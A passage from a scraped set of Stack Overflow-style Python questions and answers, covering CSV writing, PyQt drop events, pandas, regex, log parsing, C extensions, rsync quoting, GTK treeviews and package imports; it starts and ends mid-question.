New Orleans, 28, 66, 49.9, 24.3, 5.7, 8.9, 1.6, 0.4, 3.5, 3.6, 4.8, 0.9, 8.7-18.2, .475, 2.6-6.3, .415, 4.4-5.3, .821, 26.9, 0.8
L.A.Lakers, 29, 68, 49.5, 24.5, 6.0, 9.8, 1.9, 0.4, 3.4, 3.3, 4.9, 1.1, 9.3-20.6, .449, 2.3-6.7, .349, 3.6-4.5, .818, 26.9, 4.8
Phoenix, 30, 67, 49.0, 25.3, 5.8, 9.5, 2.3, 0.4, 4.1, 4.0, 4.7, 1.1, 9.2-20.3, .452, 2.6-6.6, .388, 4.4-5.6, .788, 27.0, 7.1
but when opened in excel each value is in it's own cell, but they're all in
the first row. I want a new row for each team.
Answer: Use [`csv.writer`](https://docs.python.org/2/library/csv.html#csv.writer) to
write CSV data to a CSV file:
import csv
import requests
from bs4 import BeautifulSoup
r = requests.get('http://www.hoopsstats.com/basketball/fantasy/nba/opponentstats/16/12/eff/1-1')
soup = BeautifulSoup(r.text, "html.parser")
with open("output.csv", "w") as f:
writer = csv.writer(f)
for table in soup.find_all('table', class_='statscontent'):
team = table.find('a').text
stats = [team] + [stat.text for stat in table.find_all('center')]
writer.writerow(stats)
Now, in the `output.csv` the following content would be written:
Boston,1,67,47.9,19.6,5.2,7.2,1.8,0.5,4.3,4.1,4.3,0.9,6.8-16.1,.421,1.6-4.9,.324,4.4-5.4,.816,19.7,-6.8
San Antonio,2,67,47.8,19.7,5.0,8.7,1.9,0.3,3.5,3.3,4.2,0.8,7.4-18.0,.411,1.5-4.6,.317,3.4-4.2,.819,20.7,-2.4
Atlanta,3,67,48.7,19.2,5.6,8.4,2.3,0.6,4.1,3.7,4.6,1.0,7.1-17.6,.401,2.0-5.8,.338,3.2-3.8,.828,20.8,-5.6
Miami,4,67,49.8,20.6,5.2,8.0,1.9,0.3,3.2,3.6,4.3,0.9,7.6-18.5,.407,1.9-5.3,.348,3.7-4.5,.814,21.0,2.1
L.A.Clippers,5,66,48.2,21.0,5.7,8.7,1.9,0.2,4.1,4.5,4.6,1.1,7.6-18.7,.405,1.9-5.4,.346,3.9-4.9,.799,21.1,-7.0
Toronto,6,66,48.0,20.5,5.3,8.8,1.7,0.6,3.8,3.7,4.4,0.9,7.4-18.0,.412,2.1-5.9,.349,3.6-4.4,.826,21.6,-4.3
Charlotte,7,66,48.1,19.3,6.0,9.1,1.6,0.6,3.4,4.1,5.1,0.9,7.1-17.8,.399,2.0-6.4,.321,3.0-3.7,.802,21.7,-4.5
Milwaukee,8,68,48.8,19.3,5.4,9.1,1.9,0.3,4.2,3.5,4.6,0.8,6.8-15.9,.425,1.9-6.0,.311,3.9-5.0,.788,21.7,2.1
...
Sacramento,27,66,49.7,23.7,5.9,9.5,2.3,0.4,4.0,3.6,4.8,1.0,8.6-19.8,.436,2.6-7.5,.346,3.9-4.7,.834,25.9,-0.3
New Orleans,28,66,49.9,24.3,5.7,8.9,1.6,0.4,3.5,3.6,4.8,0.9,8.7-18.2,.475,2.6-6.3,.415,4.4-5.3,.821,26.9,0.8
L.A.Lakers,29,68,49.5,24.5,6.0,9.8,1.9,0.4,3.4,3.3,4.9,1.1,9.3-20.6,.449,2.3-6.7,.349,3.6-4.5,.818,26.9,4.8
Phoenix,30,67,49.0,25.3,5.8,9.5,2.3,0.4,4.1,4.0,4.7,1.1,9.2-20.3,.452,2.6-6.6,.388,4.4-5.6,.788,27.0,7.1
|
EventFilter for Drop-Events within QTableView
Question: I try to create a QTableView that can handle drop events. For reasons of
application architecture, I want that to be done by an eventFilter of mine
(that handles some QAction-triggers for clipboard interaction as well). But
the drop-event does not seem to get through to the eventFilter.
I do not care where the data are dropped within the view. That is one of the
reasons I want it to be handled by that eventFilter and not by the model.
Furthermore, I do not want the model to pop up a dialog ("Are you sure to drop
so many elements?"), because user interaction should be done by gui elements.
btw: It **did** actually work in Qt4/PySide.
I set up an example code snippet to illustrate the problem. The interesting
thing about this is that there _can_ appear QDrop Events, but only in the
headers of the item view.
#!/usr/bin/env python2.7
# coding: utf-8
from PyQt5.QtWidgets import (
QApplication,
QMainWindow,
QTableView,
QWidget,
)
from PyQt5.QtCore import (
Qt,
QStringListModel,
QEvent
)
app = QApplication([])
window = QMainWindow()
# Table View with Drop-Options
view = QTableView(window)
view.setDropIndicatorShown(True)
view.setDragEnabled(True)
view.setAcceptDrops(True)
view.setDragDropMode(QTableView.DragDrop)
view.setDefaultDropAction(Qt.LinkAction)
view.setDropIndicatorShown(True)
window.setCentralWidget(view)
# Simple Event Filter for TableView
class Filter(QWidget):
def eventFilter(self, widget, event):
print widget, event, event.type()
if event.type() in (QEvent.DragEnter, QEvent.DragMove, QEvent.Drop):
print "Drag'n'Drop-Event"
if event.type() != QEvent.Drop:
print "\tbut no DropEvent"
event.acceptProposedAction()
else:
print "\tan actual DropEvent"
return True
return False
filter = Filter(window)
view.installEventFilter(filter)
class MyModel(QStringListModel):
# Model with activated DragDrop functionality
# vor view
def supportedDragActions(self):
print "asks supported drop actions"
return Qt.LinkAction | Qt.CopyAction
def canDropMimeData(self, *args):
print "canDropMimeData"
return True
def dropMimeData(self, *args):
print "dropMimeData"
return True
model = MyModel("Entry_A Entry_B Entry_C".split())
view.setModel(model)
window.show()
window.raise_()
app.exec_()
**Final question:** What widget handles the QDropEvents within the QTableView,
or what widget should I install the eventFilter on?
Answer: `view.viewport()` gets all the remaining events. So simply **adding**
view.viewport().installEventFilter(filter)
will do.
|
python, pandas, csv import and more
Question: I have seen many questions in regards to importing multiple csv files into a
pandas dataframe. My question is how can you import multiple csv files but
ignore the last csv file in your directory? I have had a hard time finding the
answer to this.
Also, lets assume that the csv file names are all different which is why the
code file is "/*.csv"
any resource would also be greatly appreciated. Thank you!
path =r'C:\DRO\DCL_rawdata_files' # use your path
allFiles = glob.glob(path + "/*.csv")
frame = pd.DataFrame()
list_ = []
for file_ in allFiles:
df = pd.read_csv(file_,index_col=None, header=0)
list_.append(df)
frame = pd.concat(list_)
Answer: Try this:
import os
import glob
import pandas as pd
def get_merged_csv(flist, **kwargs):
return pd.concat([pd.read_csv(f, **kwargs) for f in flist], ignore_index=True)
path =r'C:\DRO\DCL_rawdata_files' # use your path
fmask = os.path.join(path, '*.csv')
allFiles = sorted(glob.glob(fmask), key=os.path.getmtime)
frame = get_merged_csv(allFiles[:-1], index_col=None, header=0)
|
Python regular expression syntax error
Question: I am trying to write a regular expression that will match a `-` (dash),
followed by as many letters as it possibly can. What I have at the moment, is
the following: `exp = (-[a-z A-z]*)`.
I am getting a `SyntaxError: invalid syntax` error though.
Answer: try placing your expression in a string
import re
exp = re.compile('(-[a-z A-z]*)')
cheers
|
Python counter to text file
Question: So im trying to analyse a log file and extract information from it. One of the
things im trying to do is extract a list of IP addresses that have more than
30 failed attempts. In this a failed attempt is one that starts with the line
failed password for.
I have an idea for this that i wanted to try as i wasn't sure whether it will
work.
If i use python to create a counter that looks for the keyword failed that i
total and print out
This is what i have so far
failed_line=0
with open('blacklisttips.txt') as f2:
lines= f1.readlines()
for i, line in enumerate (lines):
if line.startswith(failed_line):
f2.write(line)
f2.write(lines[i+1])
Answer: So let's say your file looks like this:
failed password for 192.168.1.1
failed password for 192.168.1.2
...
more similar lines
import collections
prefix = failed password for
with open('path/to/file') as infile:
counts = collections.Counter(line.rsplit(" ",1)[1] for line in infile)
|
Cython : How wrap C function that takes a void* pointer / how to call it from python
Question: i'am trying to wrap some functions defined in a dll using Cython , the
difficulty is that lots of this functions use pointers to void* , here is an
example of functions prototype :
---------------"header.h"-----------------------
typedef void* HANDLE
int open(HANDLE* a_handle_pointer , int open_mode)
int use(HANDLE a_handle, int usage_mode )
the usage example in C is :
---------------"main.c" -----------------
#include"header.h"
HANDLE my_handle ;
int results ;
if(open(&my_handle ,1) == 0) /* open a handle with mode 1 */
{
printf ("failed to open \n);
return 0;
}
else printf("open success \n");
use(handle , 2); /* use handle (opened with open) in mode 2 */
As you can remark , the "Use" function can't do something unless the Handle
had already been opened using the "open" function , which makes it confusing
in python/cython
Here is how I define my function "open" in Cython (one of several trials )
from libc.stdint cimport uintptr_t
cdef extern from "header.h":
ctypedef void* HANDLE
int open(HANDLE* a_handle_pointer , int open_mode)
def Open( uintptr_t a_handle_pointer , int open_mode)
return open(<HANDLE*> a_handle_pointer , open_mode)
I have tried to cast void * pointer to uintptr_t as some people advise, but
still get the error : " TypeError: an integer is required " when calling the
function.
>>>from my_module import open
>>>open (handle , 1)
How would you do to solve this problem ?
I'am wondering how would I call a function from python with an argument of
type void* or void** ?
your propositions and answers are welcome !!
Answer: Writing the module/binding in Python itself is a _bad_ idea, specially if
pointers are involved. You should rather do it in C with something like
this... **Warning** : This is specific to CPython 3+. CPython 2 extensions are
coded differently! **BTW** : Renamed your `open` function as `load` because it
conflicts with POSIX's [`open(3)`](http://linux.die.net/man/3/open).
// my_module.c: My Python extension!
/* Get us the CPython headers.
*/
#include "Python.h"
/* And your function's headers, of course.
*/
#include "header.h"
/* Actual structures used to store
* a 'my_module.Handle' internally.
*/
typedef struct
{
PyObject_HEAD /* The base of all PyObjects. */
HANDLE handle; /* Our handle, great! */
} my_module_HandleObject;
/* The type 'my_module.Handle'. This variable contains
* a lot of strange, zero, and NULLified fields. Their
* purpose and story is too obscure for SO, so better
* off look at the docs for more details.
*/
static PyTypeObject my_module_HandleType =
{
PyVarObject_HEAD_INIT(NULL, 0)
"my_module.Handle", /* Of course, this is the type's name. */
sizeof(my_module_HandleObject), /* An object's size. */
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, /* ... Don't ask. */
Py_TPFLAGS_DEFAULT, /* The type's flags. There's nothing special about ours, so use the defaults. */
NULL /* No docstrings for you! */
};
/* The "wrapper" function. It takes a tuple of
* CPython PyObject's and returns a PyObject.
*/
static PyObject *my_module_load(PyObject *self, PyObject *args)
{
int load_mode;
if(!PyArg_ParseTuple(args, "i", &load_mode) != 0) { /* Parse the argument list. It should have one single integer ("i") parameter. */
return NULL;
}
/* Create a Handle object, so as to put
* in itthe handle we're about to get.
*/
my_module_HandleObject *the_object = PyObject_New(my_module_HandleObject, &my_module_HandleType);
if(the_object == NULL) {
return NULL;
}
/* Finally, do our stuff.
*/
if(load(&the_object->handle, load_mode) == -1) {
Py_DECREF(the_object);
PyErr_SetFromErrno(NULL);
return NULL;
}
return (PyObject*)the_object;
}
/* The method table. It is a list of structures, each
* describing a method of our module.
*/
static struct PyMethodDef my_module_functions[] =
{
{
"load", /* The method's name, as seen from Python code. */
(PyCFunction)my_module_load, /* The method itself. */
METH_VARARGS, /* This means the method takes arguments. */
NULL, /* We don't have documentation for this, do we? */
}, { NULL, NULL, 0, NULL } /* End of the list. */
};
/* Used to describe the module itself. */
static struct PyModuleDef my_module =
{
PyModuleDef_HEAD_INIT,
"my_module", /* The module's name. */
NULL, /* No docstring. */
-1,
my_module_functions,
NULL, NULL, NULL, NULL
};
/* This function _must_ be named this way
* in order for the module to be named as
* 'my_module'. This function is sort of
* the initialization routine for the module.
*/
PyMODINIT_FUNC PyInit_my_module()
{
my_module_HandleType.tp_new = PyType_GenericNew; /* AFAIK, this is the type's constructor. Use the default. */
if(PyType_Ready(&my_module_HandleType) < 0) { // Uh, oh. Something went wrong!
return NULL;
}
PyObject *this_module = PyModule_Create(&my_module); /* Export the whole module. */
if(this_module == NULL) {
return NULL;
}
Py_INCREF(&my_module_HandleType);
PyModule_AddObject(this_module, "Handle", (PyObject*)&my_module_HandleType);
return this_module;
}
In order to build and install the extension, [see the docs on
`distutils`](https://docs.python.org/2/extending/building.html#building).
|
Testing Equality of boto Price object
Question: I am using the python package boto to connect python to MTurk. I am needing to
award bonus payments, which are of the Price type. I want to test if one Price
object equals a certain value. Specifically, when I want to award bonus
payments, I need to check that their bonus payment is not 0 (because when you
try to award a bonus payment in MTurk, it needs to be positive). But when I go
to check values, I can't do this. For example,
from boto.mturk.connection import MTurkConnection
from boto.mturk.price import Price
a = Price(0)
a == 0
a == Price(0)
a == Price(0.0)
a > Price(0)
a < Price(0)
c = Price(.05)
c < Price(0)
c < Price(0.0)
These yield unexpected answers.
I am not sure of how to test if a has a Price equal to 0. Any suggestions?
Answer: Think you'll want the Price.amount function to compare these values.
Otherwise, I think it compares objects or some other goofiness. It'd be smart
for the library to override the standard quality test to make this more
developer-friendly.
|
How to construct a callable from a Python code object?
Question: _Realize this is a rather obscure question, so I'll explain why I'm looking
into this._
A Python jit compiler takes a callable and returns a callable.
This is fine, however - the API I'm currently working with uses a Python code
object.
A simplistic answer to this question would be to write a function to execute
the code, eg:
def code_to_function(code):
def fn():
return eval(code)
return fn
# example use
code = compile("1 + 1", '<string>', 'eval')
fn = code_to_function(code)
print(fn()) # --> 2
Which is correct, but in this case the jit (happens to be numba), won't
evaluate the actual number crunching parts - which is needed to be useful.
So the question is, how to take a code object which evaluates to a value, and
convert/construct a callable from it?
* * *
Update, thanks to @jsbueno's answer, [here's an example of a simple expression
evaluator using
numba](https://gist.github.com/ideasman42/c9ef91230ac67de6572f).
Answer:
from types import FunctionType
new_function = FunctionType(code, globals[, name[, argdefs[, closure]]])
The remaining parameters above may be taken from the original function you
have.
|
GET request working through Python but not through Postman
Question: I am trying to use the Mailman 3 REST API, but I need to call it from Spring's
Rest Template in a java class, or for testing purpose from Postman. In Python,
I can call the API by:
>>> from httplib2 import Http
>>> headers = {
... 'Content-Type': 'application/x-www-form-urlencode',
... 'Authorization': 'Basic cmVzdGFkbWluOnJlc3RwYXNz',
... }
>>> url = 'http://localhost:8001/3.0/domains'
>>> response, content = Http().request(url, 'GET', None, headers)
>>> print(response.status)
200
I want to make the same request, but through Postman. For that, I have used
the URL "<http://127.0.0.1:8001/3.0/domains>". I have added 2 fields in the
headers, the preview looks like:
GET /3.0/lists HTTP/1.1
Host: 127.0.0.1:8001
Content-Type: application/x-form-urlencode
Authorization: Basic cmVzdGFkbWluOnJlc3RwYXNz
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
But the request status only shows "pending" and I receive no response. Mailman
is running on a python virtualenv.
I am also trying to run the following command in my terminal:
curl --header "Content-Type: application/x-form-urlencoded, Authorization: Basic cmVzdGFkbWluOnJlc3RwYXNz" http://localhost:8001/3.0/domains
But the output is:
{
"title": "401 Unauthorized",
"description": "The REST API requires authentication"
}
I am stuck at this point, because I do not wish to use Mailman's Web UI
postorius, but wish to call the REST API from java class. I would also like to
know, if I am making a particular mistake in forming my Postman request, but
how can I do the same using Spring's Rest Template.
Any help would be appreciated. Thank you
Answer: To fix curl command, use the -H parameter seperately.
curl -H "Content-Type: application/x-form-urlencoded" -H "Authorization: Basic cmVzdGFkbWluOnJlc3RwYXNz" http://localhost:8001/3.0/domains
|
PyYAML with Python 3.x
Question: I've a problem using the _yaml_ (PyYAML 3.11) library in Python 3.x. When I
call `import yaml` I get the following error:
Python 3.4.3+ (default, Oct 14 2015, 16:03:50)
[GCC 5.2.1 20151010] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import yaml
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/home/mlohr/python-libs/yaml/__init__.py", line 2, in <module>
from error import *
ImportError: No module named 'error'
`error` is a file located in the yaml directory, but the `__init__.py` from
yaml does use absolute imports. I guess that's the problem, but I#'m not sure.
In <http://pyyaml.org/wiki/PyYAMLDocumentation#Python3support> is a short path
about (supposed) Python 3 support, so I'm not sure if I'm using it the wrong
way.
The same issue occurs (that's the way I found the problem) when using Python 3
with python scripts using yaml.
With Python 2.7 and 2.6 it works without problems.
Any idea/suggestion how to get that working?
Answer: It would seem that you're either using an old version of `PyYAML` after all or
using a Python2 installation of `PyYAML` with Python3 as suggested in an
[other answer](http://stackoverflow.com/a/36055462/2681632), because in your
traceback we see
from error import *
which is not an absolute import. You should either upgrade, reinstall `PyYAML`
with Python3 sources in your environment, or create a new environment for
Python3 packages.
|
Issues with activating models in Django
Question: I'm following this tutorial
<https://docs.djangoproject.com/en/1.9/intro/tutorial02/> to learn Django.
Here is the code for my model.py file.
from __future__ import unicode_literals
from django.db import models
# Create your models here
class Question(models.Model):
question_text = models.CharField(max_length=200)
pub_date = models.DateTimeField('date published')
class Choice(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE)
choice_text = models.CharField(max_length=200)
votes = models.IntegerField(default=0)
When I run the following command:
python manage.py makemigrations polls
I see that only the model question is being created and not the model choice.
When I try to the edit the model.py file and rerun the 'makemigration polls'
command, I get the following error:
You are trying to add a non-nullable field 'pub_date' to question without a default; we can't do that (the database needs something to populate existing rows).
Please select a fix:
1) Provide a one-off default now (will be set on all existing rows)
2) Quit, and let me add a default in models.py
Select an option:
I'm not sure what's wrong with the code here. Can someone please help me out?
Answer: You've got out of sync. Delete your database file, and the Python files under
polls/migrations, and run makemigrations again.
This was caused by you not having the pub_date field when you initially
migrated. There are ways of fixing this, but for the purposes of the tutorial,
you should just start again.
|
`subprocess.call` operates differently to running command directly in shell
Question: I have the following command in Python, which I wrote with the aim of copying
only `.yaml` files from a `source` directory (on the network) to a local
`target` directory:
import subprocess as sp
cmd = ['rsync', '-rvt', "--include='*/*.yaml'", "--exclude='*/*'",
source , destination]
print ' '.join(cmd)
sp.call(cmd)
However, when I run this Python, _all_ files are copied, including `.jpg` etc.
* * *
When I run the shell command directly:
rsync -rvt --include='*/*.yaml' --exclude='*/*' <source> <target>
...then only `.yaml` files are copied, as expected.
* * *
What is going on here? Why does the command operate differently in shell than
under `subprocess.call`?
(This is with a Bash shell on Ubuntu 14.04, using Anaconda's Python 2)
Answer: You should remove the single quotes around the wildcards:
['rsync', '-rvt', "--include=*/*.yaml", "--exclude=*/*", source , destination]
Those quotes are processed by the shell, the shell doesn't pass in the quotes
to rsync.
|
How to write symbol in csv file?
Question: I am trying to write username and symbol into my csv file from python code,but
whenever my loop come to that line it skip that record and write next record
in the file.Thank you in advance. Please help me in writing symbol into csv
file
For example: I want to write(Simeon Miller ✪)this name into name column.
Answer: Python doesn't magically skip records unless you explicitly code that.
Assuming the data is of type `unicode` you have to encode it before writing it
to the file. UTF-8 is a safe bet because that encoding can encode all possible
characters in `unicode` strings.
#!/usr/bin/env python
# coding: utf-8
import csv
def main():
data = [[u'Simeon Miller ✪', 42], [u'Roger Rabbit', 4711]]
with open('test.csv', 'wb') as csv_file:
writer = csv.writer(csv_file)
for name, number in data:
writer.writerow([name.encode('utf-8'), str(number)])
if __name__ == '__main__':
main()
|
Unable to import nltk on mac os x
Question: I had successfully installed nltk [from this
site](http://www.nltk.org/install.html). And just to validate i am able to
import it from the terminal. But when i execute my python script from the
Spyder it gives me following error in Spyders terminal
File "/Prateek/Python/RC_ISSUES/algorithm_RC.py", line 9, in <module>
import nltk
ImportError: No module named nltk
Below output is from the terminal
[](http://i.stack.imgur.com/Y84Ij.png)
I know there might be similar questions but i thought it is different from
rest of the other questions
Answer: When you execute a python script, the operating system is looking for the
interpreter as specified on the first line of the script, which most of the
time is:
#!/usr/bin/python
On Mac OS X, this is the python as distributed with the system when you
installed it, which is the one distributed with the system. It is usually very
likely to be the one that has the older compilation date:
2.7.10 (default, Jun 1 2015, 09:45:55) [GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.57)]
If you do `type python` in your shell, you're very likely to see another path
to that interpreter, e.g. if you installed the brew version of python:
% type python
python is /usr/local/bin/python
So you have two ways around it, either you explicitly launch your script with
python:
python algorithm_RC.py
in doubt, use the full path you found out with `type`:
/usr/local/bin/python algorithm_RC.py
or, you can change your script first line with:
#!/usr/bin/env python
which will use the same python as the one you're reaching from your shell. You
can also use the full path to your manually installed python, by making that
line:
#!/usr/local/bin/python
or whatever the `type` command gave. But I would advise you against that, as
the `/usr/bin/env` solution is more flexible and makes sure you're using in
both cases the same python from the shell and within the script.
Finally, you can also use the system's python by calling explicitly
`easy_install` from `/usr/bin`:
sudo /usr/bin/pip nltk
And if you don't have pip there, then you'll have to install it first:
sudo /usr/bin/easy_install pip
HTH
|
Displaying JSON specific JSON result in Python
Question: I'm new with Python and have the following code:
def doSentimentAnalysisAndPrint(keyval):
import urllib
data = urllib.urlencode(keyval)
u = urllib.urlopen("http://text-processing.com/api/sentiment/", data)
json_string = u.read()
parsed_json = json.loads(json_string)
# print the various key:values
print(parsed_json['probability'])
print ">>", parsed_json['label']
The printed result is:
{u'neg': 0.24087437946650492, u'neutral': 0.19184084028194423, u'pos': 0.7591256205334951}
>> pos
I would like to only print out the actual result? E.G. in this case "Positive:
0.7591256205334951" but don't know how to achieve this?
Answer: Do read the [API documentation](http://text-
processing.com/docs/sentiment.html) when using one. The `'label'` key points
to what key in the `'probability'` dictionary is the determined sentiment:
> **label:** will be either `pos` if the text is determined to be _positive_ ,
> `neg` if the text is _negative_ , or `neutral` if the text is neither `pos`
> nor `neg`.
>
> **probability:** an object that contains the probability for each label.
> `neg` and `pos` will add up to 1, while `neutral` is standalone. If
> `neutral` is greater than `0.5` then the `label` will be `neutral`.
> Otherwise, the `label` will be `pos` or `neg`, whichever has the greater
> probability.
So you already have a label, and the corresponding value is just a key lookup.
Map the label values to a string to print (like `pos` mapping to `Positive`,
and combine the two:
sentiments = {'pos': 'Positive', 'neg': 'Negative', 'neutral': 'Neutral'}
label = parsed_json['label']
print sentiments[label], parsed_json['probability'][label]
|
How to detect ASCII characters on a string in python
Question: I'm working on a tool in maya where at some point, the user can enter a
comment on the textField. This comment will later be used as part of the
filename that's gonna be saved. I work in France so the user might use some
accentuated characters as "é" or "à".
What i would love would be to just translate them to their non accentuated
corresponding character. However I realise this is quite tricky so I would be
ok with juste detecting them so I can issue a warning message to the user. I
don't want to just strip the incriminated letters as it might result on the
comment to be incomprensible.
I know they're some similar questions around here, but they're all on other
languages I don't know/understand (such as C++ or php).
Here's what I found so far around the web :
import re
comment = 'something written with some french words and numbers'
if re.match(r'^[A-Za-z0-9_]+$', text):
# issue a warning for the user
This first solution doesn't work because it considers accentuated characters
as acceptable.
I found this :
ENGLISH_CHARS = re.compile('[^\W_]', re.IGNORECASE)
ALL_CHARS = re.compile('[^\W_]', re.IGNORECASE | re.UNICODE)
assert len(ENGLISH_CHARS.findall('_àÖÎ_')) == 0
assert len(ALL_CHARS.findall('_àÖÎ_')) == 3
which I thought about using like this :
ENGLISH_CHARS = re.compile('[^\W_]', re.IGNORECASE)
if len(ENGLISH_CHARS .findall(comment)) != len(comment):
# issue a warning for the user
but it only seems to work if the string is encapsulated within underscores.
I'm really sorry if this a duplicate of something I haven't found or
understood, but it's been driving me nuts.
Answer: The [unicode](https://docs.python.org/2/howto/unicode.html) command tries to
encode your string in the given encoding. It will default to ASCII and raise
an exception if it fails.
try:
unicode(filename)
except UnicodeDecodeError:
show_warning()
This only allows unaccented characters, which is maybe what you want.
If you already have an Unicode string, you have to change the encoding, which
will raise an UnicodeEncodeError.
filename.encode("ASCII")
Example:
>>> unicode("ää")
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 0: ordinal not in range(128)
|
looping through folder of csvs python
Question: I have been looking for sometime now and I have not had any luck. Here is my
issue: I have a network drive filled with folders with sub-folders of CSVs.
Eventually, these csvs need to get imported into a database. Based on the
structure there is one row (the second line of each sheet) that I want removed
from each one and appended to one new sheet from each other one to create its
own sheet and table. A while back I found out that Python can achieve this.
However, I ran into some issues. I am doing this one step at a time, so I do
not feel overwhelmed by not knowing where to start. The problem is that I find
all of the CSVs, but I cannot open each one to read any line to work on
writing to a file.. I have been using some other threads as resources, but ran
into **IOError: [Errno 13] Permission denied: '.'** I tried to exhaust all of
my options before I came here, but now I am running out of time. I would more
than appreciate the help.
Here is the code and as you can see from the comments that I have been playing
for a while:
#!/usr/bin/python
import os
import csv
import sys
#output_file = sys.argv[1]
input_path = sys.argv[1] #I would pass a '.' here for current directory on the drive
#output_file = sys.argv[2]
def doWhatYouWant(line):
print line
return line
#let the function return, not only print, to get the value for use as below
#filewriter = csv.writer(open(output_file,'wb'))
#This recursively opens opens .csv files and opens them
directory = os.path.join(input_path)
for root,dirs,files in os.walk(directory):
for file in files:
if file.endswith(".csv"):
f=open(input_path, 'r')
lines= f.readlines()
f.close()
#reader =csv.DictReader(f,delimiter=',')
# writer = open("testsummary.txt",'wb')
# writer = csv.writer(writer, delimiter=',')
f=open(file.txt,'w')
#for row in reader:
# writer.writerow(row[2])
# print(row[1])
newline=doWhatYouWant(line)
f.write(newline)
f.close()
#f.close()
#print file
Thank you all for your help in advance.
Answer: You are getting the `IOError: [Errno 13] Permission denied: '.'` exception
because you are attempting to open the current directory itself as if it were
a readable text file:
open(input_path, 'r')
Instead, you need to do something like this:
open(os.path.join(root, file), 'r')
* * *
Also consider using
[`with`](https://docs.python.org/2/reference/compound_stmts.html#with) when
opening files. Eg
with open(filename, 'r') as f:
|
How to block size of last column in treeview gtk3
Question: Below a demo treeview. I would like to fixed the width of the last column.
After a lot of test with different command, I ask help.
<https://andrewsteele.me.uk/learngtk.org/tutorials/python_gtk3_tutorial/html/treeviewcolumn.html>
it's said: The sizing of the column can also be customised in a number of ways
depending on the change in the content by using the method:
treeviewcolumn.set_sizing(sizing)
The sizing argument can be set to Gtk.TreeViewColumnSizing.GROW_ONLY sets the
column to never shrink regardless of the content,
Gtk.TreeViewColumnSizing.AUTOSIZE adjusts the column to be an optimal size and
is updated everytime the model changes, and Gtk.TreeViewColumnSizing.FIXED
which sets columns to be a fixed pixel width.
With my code, in fact the last column is taking the available space
#!/usr/bin/env python3
# -*- coding: ISO-8859-1 -*-
# liststore.py
from gi.repository import Gtk,Gdk
window = Gtk.Window()
window.connect("destroy", lambda q: Gtk.main_quit())
liststore = Gtk.ListStore(str, int)
liststore.append(["Oranges", 5])
liststore.append(["Apples", 3])
liststore.append(["Bananas", 1])
liststore.append(["Tomatoes", 4])
liststore.append(["Cucumber", 1])
liststore.append(["potatoes", 10])
liststore.append(["apricot", 100])
treeview = Gtk.TreeView(model=liststore)
treeview.set_rules_hint( True )
window.add(treeview)
treeviewcolumn = Gtk.TreeViewColumn("Item")
treeview.append_column(treeviewcolumn)
cellrenderertext = Gtk.CellRendererText()
treeviewcolumn.pack_start(cellrenderertext, True)
treeviewcolumn.add_attribute(cellrenderertext, "text", 0)
treeviewcolumn = Gtk.TreeViewColumn("Quantity")
treeviewcolumn.props.sizing = Gtk.TreeViewColumnSizing.FIXED
treeview.append_column(treeviewcolumn)
cellrenderertext = Gtk.CellRendererText()
treeviewcolumn.pack_start(cellrenderertext, True)
treeviewcolumn.add_attribute(cellrenderertext, "text", 1)
css_provider = Gtk.CssProvider()
css = """
/* font operate on entire GtkTreeView not for selected row */
GtkTreeView {
text-shadow: 1px 1px 2px black, 0 0 1em blue, 0 0 0.2em blue;
color: white;
font: 1.5em Georgia, "Bitstream Charter", "URW Bookman L", "Century Schoolbook L", serif;
font-weight: bold;
font-style: italic;box-shadow: 5px 3px red;}
GtkTreeView row:nth-child(even) {
background-image: -gtk-gradient (linear,
left top,
left bottom,
from (#d0e4f7),
color-stop (0.5, darker (#d0e4f7)),
to (#fdffff));
}
GtkTreeView row:nth-child(odd) {
background-image: -gtk-gradient (linear,
left top,
left bottom,
from (yellow),
color-stop (0.5, darker (yellow)),
to (#fdffff));
}
/* next line only border action operate */
GtkTreeView:selected{color: white; background: green; border-width: 1px; border-color: black;}
/* next line for Gtk.TreeViewColumn */
column-header .button{color: white; background: purple;}
"""
css_provider.load_from_data(css)
screen = Gdk.Screen.get_default()
style_context = window.get_style_context()
style_context.add_provider_for_screen(screen, css_provider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)
window.show_all()
Gtk.main()
Answer: In your case the issue is that GTK tries to fill up the space in someway, as
none of the column was set to expand the last column will expand. So in order
to fix your issue change your code as follows:
treeviewcolumn = Gtk.TreeViewColumn("Item")
treeviewcolumn.set_expand(True)
treeview.append_column(treeviewcolumn)
This will tell GTK that you want the Item column to expand, by default this
value is `False` so the other column (like the "Quantity" column) will not
expand.
|
How to build a package out of a class
Question: I have written a class called editClass which works fine. The class is
completely defined in the file editClass.py. The constructor is given by:
def __init__(self,filename):
self.File=filename
I want now to build a package that only contains this class. In future of
course also other classes... I spend some time on google and here searching
how exactly this works but I have reached some kind of dead end. What I have
so far are the following files
setup.py
edit/__init__.py
edit/editClass.py
The class definition in editClass remained untouched and works. The init only
contains: from editClass import editClass and the setup is
from setuptools import setup
setup(name='edit',
version='0.1.0',
packages=['edit'],
author='my name'
)
I installed this with $python setup.py install in the shell. This seemed to
work. In a test file test.py I want to call the constructor of editClass. But
import edit
filename= "name.txt"
test=edit.editClass(filename)
does not work. The error massage is:
AttributeError: 'module' object has no attribute 'editClass'
I do not know if I referred to the constructor worngle or if the problem is
already in the installed package. I to be honest, I don't even know how to
check.
edit: Since from edit import editClass does nor work either, I believe the
problem is in the definition of the package.
Answer: Given your code structure, you need to change
import edit
filename= "name.txt"
test=edit.editClass(filename)
to
import edit.editClass
filename = "name.txt"
test = edit.editClass.editClass(filename)
What you've actually got is a package called `edit`, containing a module
called `editClass` containing a class called `editClass`. So your import needs
to import the module (`edit.editClass`) and you then need to qualify the class
with it's module name. Alternatively you can do
from edit.editClass import editClass
filename = "name.txt"
test = editClass(filename)
On the other hand, if what you were trying to achieve was for your client code
to look as you had it, then you need to put the `editClass` class definition
into a file called `edit.py`.
|
Reverse Dictionary. Output keeps changing
Question: So I have to write a function that receives a dictionary as input argument and
returns a reverse of the input dictionary where the values of the original
dictionary are used as keys for the returned dictionary and the keys of the
original dictionary are used as value for the returned dictionary.
For example, if the function is called as
reverse_dictionary({'Accurate': ['exact', 'precise'], 'exact': ['precise'], 'astute': ['Smart', 'clever'], 'smart': ['clever', 'bright', 'talented']})
